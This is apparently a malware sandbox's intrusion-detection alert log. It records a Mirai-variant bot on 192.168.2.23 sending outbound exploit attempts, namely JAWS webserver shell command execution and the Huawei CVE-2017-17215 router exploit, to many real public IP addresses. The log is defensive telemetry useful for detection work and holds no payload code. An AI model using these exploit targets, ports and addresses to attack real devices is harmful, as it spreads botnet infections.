                                              2024-12-13T01:15:06.038536+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234553041.119.102.115501TCP
                                              2024-12-13T01:15:06.038681+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352436208.114.135.2555501TCP
                                              2024-12-13T01:15:06.038681+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352436208.114.135.2555501TCP
                                              2024-12-13T01:15:06.038864+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360976197.236.103.2145501TCP
                                              2024-12-13T01:15:06.038864+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360976197.236.103.2145501TCP
                                              2024-12-13T01:15:06.053904+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235536480.186.109.1585501TCP
                                              2024-12-13T01:15:06.053904+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235536480.186.109.1585501TCP
                                              2024-12-13T01:15:06.053916+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360666168.120.209.335501TCP
                                              2024-12-13T01:15:06.053916+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360666168.120.209.335501TCP
                                              2024-12-13T01:15:06.054088+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349742148.134.31.1135501TCP
                                              2024-12-13T01:15:06.054088+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349742148.134.31.1135501TCP
                                              2024-12-13T01:15:06.147739+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235635069.155.12.1455501TCP
                                              2024-12-13T01:15:06.147739+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235635069.155.12.1455501TCP
                                              2024-12-13T01:15:06.163055+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354788177.9.26.635501TCP
                                              2024-12-13T01:15:06.163055+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354788177.9.26.635501TCP
                                              2024-12-13T01:15:06.163161+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344938150.238.186.675501TCP
                                              2024-12-13T01:15:06.163161+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344938150.238.186.675501TCP
                                              2024-12-13T01:15:06.350774+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352222197.64.25.23937215TCP
                                              2024-12-13T01:15:06.350865+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359676197.44.93.14537215TCP
                                              2024-12-13T01:15:06.350948+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350764197.220.45.3737215TCP
                                              2024-12-13T01:15:06.382193+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333084197.243.58.2737215TCP
                                              2024-12-13T01:15:06.475837+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348482102.155.236.19637215TCP
                                              2024-12-13T01:15:07.304580+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234531035.47.69.1675501TCP
                                              2024-12-13T01:15:07.304580+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234531035.47.69.1675501TCP
                                              2024-12-13T01:15:07.304899+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339348218.223.37.455501TCP
                                              2024-12-13T01:15:07.304899+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339348218.223.37.455501TCP
                                              2024-12-13T01:15:07.305124+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233500442.24.133.335501TCP
                                              2024-12-13T01:15:07.305124+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233500442.24.133.335501TCP
                                              2024-12-13T01:15:07.319979+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339370155.25.92.495501TCP
                                              2024-12-13T01:15:07.319979+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339370155.25.92.495501TCP
                                              2024-12-13T01:15:07.412070+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347448160.89.148.4937215TCP
                                              2024-12-13T01:15:08.053799+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234648263.242.80.2005501TCP
                                              2024-12-13T01:15:08.053799+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234648263.242.80.2005501TCP
                                              2024-12-13T01:15:08.303750+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341014134.66.130.2115501TCP
                                              2024-12-13T01:15:08.303750+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341014134.66.130.2115501TCP
                                              2024-12-13T01:15:08.303897+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343602156.88.12.295501TCP
                                              2024-12-13T01:15:08.303897+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343602156.88.12.295501TCP
                                              2024-12-13T01:15:08.303989+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357656167.220.127.475501TCP
                                              2024-12-13T01:15:08.303989+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357656167.220.127.475501TCP
                                              2024-12-13T01:15:08.304075+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344972138.108.78.1445501TCP
                                              2024-12-13T01:15:08.304075+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344972138.108.78.1445501TCP
                                              2024-12-13T01:15:08.304171+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338414208.75.58.435501TCP
                                              2024-12-13T01:15:08.304171+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338414208.75.58.435501TCP
                                              2024-12-13T01:15:08.304262+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357498185.42.85.1335501TCP
                                              2024-12-13T01:15:08.304262+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357498185.42.85.1335501TCP
                                              2024-12-13T01:15:08.350561+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351406168.64.76.2515501TCP
                                              2024-12-13T01:15:08.350561+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351406168.64.76.2515501TCP
                                              2024-12-13T01:15:08.413100+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351354197.56.233.13937215TCP
                                              2024-12-13T01:15:08.553848+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337060157.175.0.20937215TCP
                                              2024-12-13T01:15:08.772788+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341554156.161.190.18937215TCP
                                              2024-12-13T01:15:08.804079+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349186156.225.76.15937215TCP
                                              2024-12-13T01:15:09.351160+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339562138.102.61.335501TCP
                                              2024-12-13T01:15:09.351160+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339562138.102.61.335501TCP
                                              2024-12-13T01:15:09.382042+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350938135.80.121.1645501TCP
                                              2024-12-13T01:15:09.382042+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350938135.80.121.1645501TCP
                                              2024-12-13T01:15:09.413257+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234316892.9.8.1755501TCP
                                              2024-12-13T01:15:09.413257+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234316892.9.8.1755501TCP
                                              2024-12-13T01:15:09.413505+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333268180.221.147.645501TCP
                                              2024-12-13T01:15:09.413505+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333268180.221.147.645501TCP
                                              2024-12-13T01:15:09.429101+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234138857.214.100.635501TCP
                                              2024-12-13T01:15:09.429101+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234138857.214.100.635501TCP
                                              2024-12-13T01:15:09.475982+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357766144.69.147.1655501TCP
                                              2024-12-13T01:15:09.475982+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357766144.69.147.1655501TCP
                                              2024-12-13T01:15:09.554085+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342528102.87.229.6837215TCP
                                              2024-12-13T01:15:09.804283+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339046186.92.111.4937215TCP
                                              2024-12-13T01:15:10.350936+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338590222.53.105.1425501TCP
                                              2024-12-13T01:15:10.350936+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338590222.53.105.1425501TCP
                                              2024-12-13T01:15:10.351012+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342162136.135.157.2315501TCP
                                              2024-12-13T01:15:10.351012+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342162136.135.157.2315501TCP
                                              2024-12-13T01:15:10.475915+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343866201.196.74.1545501TCP
                                              2024-12-13T01:15:10.475915+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343866201.196.74.1545501TCP
                                              2024-12-13T01:15:11.350680+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234888087.32.114.2195501TCP
                                              2024-12-13T01:15:11.350680+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234888087.32.114.2195501TCP
                                              2024-12-13T01:15:11.350740+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354464107.95.233.225501TCP
                                              2024-12-13T01:15:11.350740+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354464107.95.233.225501TCP
                                              2024-12-13T01:15:11.366719+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339600193.86.37.1015501TCP
                                              2024-12-13T01:15:11.366719+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339600193.86.37.1015501TCP
                                              2024-12-13T01:15:11.461598+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346750153.229.43.2365501TCP
                                              2024-12-13T01:15:11.461598+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346750153.229.43.2365501TCP
                                              2024-12-13T01:15:11.554389+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346314157.235.15.7437215TCP
                                              2024-12-13T01:15:11.929191+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337560160.21.215.13537215TCP
                                              2024-12-13T01:15:12.632084+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235231082.125.57.2005501TCP
                                              2024-12-13T01:15:12.632084+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235231082.125.57.2005501TCP
                                              2024-12-13T01:15:12.632329+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234466685.121.137.185501TCP
                                              2024-12-13T01:15:12.632329+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234466685.121.137.185501TCP
                                              2024-12-13T01:15:12.881851+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234713273.139.51.25501TCP
                                              2024-12-13T01:15:12.881851+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234713273.139.51.25501TCP
                                              2024-12-13T01:15:12.913394+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345580117.178.215.1565501TCP
                                              2024-12-13T01:15:12.913394+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345580117.178.215.1565501TCP
                                              2024-12-13T01:15:13.772896+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234808468.6.178.765501TCP
                                              2024-12-13T01:15:13.772896+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234808468.6.178.765501TCP
                                              2024-12-13T01:15:13.773002+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351260131.1.57.1335501TCP
                                              2024-12-13T01:15:13.773002+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351260131.1.57.1335501TCP
                                              2024-12-13T01:15:13.773131+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335574212.67.182.2015501TCP
                                              2024-12-13T01:15:13.773131+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335574212.67.182.2015501TCP
                                              2024-12-13T01:15:13.773141+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360120158.233.52.1245501TCP
                                              2024-12-13T01:15:13.773141+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360120158.233.52.1245501TCP
                                              2024-12-13T01:15:13.804293+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357346183.102.78.1675501TCP
                                              2024-12-13T01:15:13.804293+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357346183.102.78.1675501TCP
                                              2024-12-13T01:15:13.804382+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347146176.193.153.2405501TCP
                                              2024-12-13T01:15:13.804382+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347146176.193.153.2405501TCP
                                              2024-12-13T01:15:13.835768+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357450181.35.247.6337215TCP
                                              2024-12-13T01:15:14.804540+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356774192.56.187.345501TCP
                                              2024-12-13T01:15:14.804540+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356774192.56.187.345501TCP
                                              2024-12-13T01:15:14.804540+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235016461.248.12.1375501TCP
                                              2024-12-13T01:15:14.804540+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235016461.248.12.1375501TCP
                                              2024-12-13T01:15:14.804553+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358514125.171.187.1195501TCP
                                              2024-12-13T01:15:14.804553+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358514125.171.187.1195501TCP
                                              2024-12-13T01:15:14.805145+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234524232.191.176.1505501TCP
                                              2024-12-13T01:15:14.805145+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234524232.191.176.1505501TCP
                                              2024-12-13T01:15:14.819506+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352336131.4.227.595501TCP
                                              2024-12-13T01:15:14.819506+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352336131.4.227.595501TCP
                                              2024-12-13T01:15:14.851017+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233335699.197.232.1435501TCP
                                              2024-12-13T01:15:14.851017+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233335699.197.232.1435501TCP
                                              2024-12-13T01:15:15.054268+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336992143.18.61.315501TCP
                                              2024-12-13T01:15:15.054268+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336992143.18.61.315501TCP
                                              2024-12-13T01:15:15.883392+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338832208.169.18.765501TCP
                                              2024-12-13T01:15:15.883392+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338832208.169.18.765501TCP
                                              2024-12-13T01:15:15.899100+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344556130.54.234.1635501TCP
                                              2024-12-13T01:15:15.899100+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344556130.54.234.1635501TCP
                                              2024-12-13T01:15:15.899235+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233783044.21.167.1225501TCP
                                              2024-12-13T01:15:15.899235+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233783044.21.167.1225501TCP
                                              2024-12-13T01:15:15.914556+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341132115.214.19.1805501TCP
                                              2024-12-13T01:15:15.914556+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341132115.214.19.1805501TCP
                                              2024-12-13T01:15:16.148438+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346312110.155.123.1745501TCP
                                              2024-12-13T01:15:16.148438+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346312110.155.123.1745501TCP
                                              2024-12-13T01:15:16.179763+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349894182.117.155.405501TCP
                                              2024-12-13T01:15:16.179763+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349894182.117.155.405501TCP
                                              2024-12-13T01:15:16.866688+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357252181.36.218.18937215TCP
                                              2024-12-13T01:15:16.882851+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333860181.166.140.11937215TCP
                                              2024-12-13T01:15:16.898450+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339950181.36.65.16637215TCP
                                              2024-12-13T01:15:16.913400+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354304181.174.17.14937215TCP
                                              2024-12-13T01:15:16.931595+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358796181.131.119.11237215TCP
                                              2024-12-13T01:15:16.931598+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337282181.44.186.6137215TCP
                                              2024-12-13T01:15:16.976500+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345798197.51.150.1537215TCP
                                              2024-12-13T01:15:16.976626+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349562197.205.191.15637215TCP
                                              2024-12-13T01:15:17.007012+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344240197.141.14.10337215TCP
                                              2024-12-13T01:15:17.007194+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355374197.117.143.21637215TCP
                                              2024-12-13T01:15:17.179013+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352502197.134.88.10337215TCP
                                              2024-12-13T01:15:17.226388+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335252197.251.89.22837215TCP
                                              2024-12-13T01:15:17.241594+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350350197.153.24.15737215TCP
                                              2024-12-13T01:15:17.883247+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341550181.187.174.2237215TCP
                                              2024-12-13T01:15:17.898483+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352878181.227.175.25237215TCP
                                              2024-12-13T01:15:17.913964+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338172181.176.206.25437215TCP
                                              2024-12-13T01:15:17.929279+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335052181.174.202.3637215TCP
                                              2024-12-13T01:15:18.116599+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235064041.142.27.13837215TCP
                                              2024-12-13T01:15:19.320004+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236003877.72.21.1805501TCP
                                              2024-12-13T01:15:19.320004+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236003877.72.21.1805501TCP
                                              2024-12-13T01:15:19.320035+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234655468.255.124.1905501TCP
                                              2024-12-13T01:15:19.320035+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234655468.255.124.1905501TCP
                                              2024-12-13T01:15:19.320188+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345768207.212.58.595501TCP
                                              2024-12-13T01:15:19.320188+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345768207.212.58.595501TCP
                                              2024-12-13T01:15:19.320320+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360164150.176.156.605501TCP
                                              2024-12-13T01:15:19.320320+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360164150.176.156.605501TCP
                                              2024-12-13T01:15:19.335407+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234528614.221.84.1255501TCP
                                              2024-12-13T01:15:19.335407+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234528614.221.84.1255501TCP
                                              2024-12-13T01:15:19.351422+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235144069.79.130.1015501TCP
                                              2024-12-13T01:15:19.351422+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235144069.79.130.1015501TCP
                                              2024-12-13T01:15:20.115898+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353286181.245.195.24637215TCP
                                              2024-12-13T01:15:20.115898+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334160181.44.80.17337215TCP
                                              2024-12-13T01:15:20.115914+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345740181.180.43.23237215TCP
                                              2024-12-13T01:15:20.115915+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349116181.186.32.23237215TCP
                                              2024-12-13T01:15:20.115916+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348264181.20.244.6037215TCP
                                              2024-12-13T01:15:20.115923+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352074197.104.253.4437215TCP
                                              2024-12-13T01:15:20.193262+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350484197.98.103.12037215TCP
                                              2024-12-13T01:15:20.226342+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344096160.77.43.18637215TCP
                                              2024-12-13T01:15:20.226523+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340690160.71.204.24137215TCP
                                              2024-12-13T01:15:20.275323+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356436160.82.240.12537215TCP
                                              2024-12-13T01:15:20.320421+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235532675.146.4.2005501TCP
                                              2024-12-13T01:15:20.320421+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235532675.146.4.2005501TCP
                                              2024-12-13T01:15:20.335425+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234323097.240.130.535501TCP
                                              2024-12-13T01:15:20.335425+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234323097.240.130.535501TCP
                                              2024-12-13T01:15:20.335628+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358386198.86.144.985501TCP
                                              2024-12-13T01:15:20.335628+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358386198.86.144.985501TCP
                                              2024-12-13T01:15:21.148268+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346992181.196.167.22637215TCP
                                              2024-12-13T01:15:21.507713+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355192190.50.115.6037215TCP
                                              2024-12-13T01:15:21.773568+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354360197.219.184.6037215TCP
                                              2024-12-13T01:15:22.351440+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234462017.69.21.1415501TCP
                                              2024-12-13T01:15:22.351440+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234462017.69.21.1415501TCP
                                              2024-12-13T01:15:22.351453+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349600197.63.96.2465501TCP
                                              2024-12-13T01:15:22.351453+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349600197.63.96.2465501TCP
                                              2024-12-13T01:15:22.476223+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349934192.91.67.1545501TCP
                                              2024-12-13T01:15:22.476223+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349934192.91.67.1545501TCP
                                              2024-12-13T01:15:22.476231+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234670645.68.181.845501TCP
                                              2024-12-13T01:15:22.476231+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234670645.68.181.845501TCP
                                              2024-12-13T01:15:22.476243+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347294187.106.65.2225501TCP
                                              2024-12-13T01:15:22.476243+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347294187.106.65.2225501TCP
                                              2024-12-13T01:15:22.554379+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338950190.225.69.24637215TCP
                                              2024-12-13T01:15:22.554382+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233897295.53.27.2305501TCP
                                              2024-12-13T01:15:22.554382+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233897295.53.27.2305501TCP
                                              2024-12-13T01:15:22.554382+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357764190.207.64.25537215TCP
                                              2024-12-13T01:15:22.788562+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335234186.182.27.9237215TCP
                                              2024-12-13T01:15:23.273028+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338270160.56.167.11437215TCP
                                              2024-12-13T01:15:23.273030+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357718160.4.178.24137215TCP
                                              2024-12-13T01:15:23.273167+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345490160.35.241.13637215TCP
                                              2024-12-13T01:15:23.273222+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356584160.4.81.15737215TCP
